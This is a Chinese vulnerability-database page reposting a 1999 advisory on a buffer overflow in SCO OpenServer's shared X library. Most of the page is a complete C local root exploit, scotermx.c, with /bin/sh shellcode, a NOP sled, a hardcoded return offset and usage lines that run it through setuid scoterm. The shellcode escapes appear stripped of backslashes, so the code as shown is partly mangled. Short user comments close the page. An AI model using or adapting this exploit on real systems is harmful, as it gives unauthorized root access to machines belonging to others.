SCO Open Server 5.0.5 – X Library Buffer Overflow (2)
漏洞ID | 1053402 | 漏洞类型 | |
发布时间 | 1999-06-21 | 更新时间 | 1999-06-21 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/638/info
A buffer overflow vulnerability in the shared X library may allows local users to obtain higher privileges. Any setuid applications linked against the library are possibly vulnerable. The vulnerability is in the handling of the '-bg' command line parameter.
Setuid root applications known to be vulnerable inclue xload, xmcd, xterm, and scoterm.
Setuid bin applications known to be vulnerable include scosession.
/*
* <scotermx.c> Local root exploit
*
* Offset: scoterm (SCO OpenServer 5.0.4)
* 0 -> From an open scoterm (without display parameter)
* 2500 -> From remote telnet (with display parameter)
*
* Usage:
* $ cc scotermx.c -o scotermx
* $ scoterm
* $ /usr/bin/X11/scoterm -geometry `scotermx 0`
* or
* $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `scotermx 2500`
*
* Note: scoterm need to be run from a valid x-display
*
* By: The Dark Raver of CPNE (Murcia/Spain - 21/6/99)
*
* <http://members.tripod.com/~ochodedos> - <[email protected]>
*
*/
#include <stdlib.h>
#include <stdio.h>
char hell[]=
"xebx1bx5ex31xdbx89x5ex07x89x5ex0cx88x5ex11x31xc0"
"xb0x3bx8dx7ex07x89xf9x53x51x56x56xebx10xe8xe0xff"
"xffxff/bin/shxaaxaaxaaxaax9axaaxaaxaaxaax07xaa";
/*
char hell[]=
"xebx1b" // start: jmp uno
"x5e" // dos: popl %esi
"x31xdb" // xorl %ebx,%ebx
"x89x5ex07" // movb %bl,0x7(%esi)
"x89x5ex0c" // movl %ebx,0x0c(%esi)
"x88x5ex11" // movb %bl,0x11(%esi)
"x31xc0" // xorl %eax,%eax
"xb0x3b" // movb $0x3b,%al
"x8dx7ex07" // leal 0x07(%esi),%edi
"x89xf9" // movl %edi,%ecx
"x53" // pushl %ebx
"x51" // pushl %ecx
"x56" // pushl %esi
"x56" // pushl %esi
"xebx10" // jmp execve
"xe8xe0xffxffxff" // uno: call dos
"/bin/sh"
"xaaxaaxaaxaa"
"x9axaaxaaxaaxaax07xaa"; // execve: lcall 0x7,0x0
*/
#define OFF 0x80452ff // SCO OpenServer 5.0.4
#define ALINEA 1
#define LEN 2000
int main(int argc, char *argv[]) {
int offset=0;
char buf[LEN];
int i;
if(argc < 2) {
printf("Usage: scotermx <offset>n");
exit(0); }
else {
offset=atoi(argv[1]); }
memset(buf,0x90,LEN);
memcpy(buf+1000,hell,strlen(hell));
for(i=1100+ALINEA;i<LEN-4;i+=4)
*(int *)&buf[i]=OFF+offset;
for(i=0;i<LEN;i++)
putchar(buf[i]);
exit(0);
}
相关推荐: FTP PASV “Pizza Thief”服务拒绝及非法数据存取漏洞
FTP PASV “Pizza Thief”服务拒绝及非法数据存取漏洞 漏洞ID 1207168 漏洞类型 未知 发布时间 1999-02-01 更新时间 1999-02-01 CVE编号 CVE-1999-0351 CNNVD-ID CNNVD-199902…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666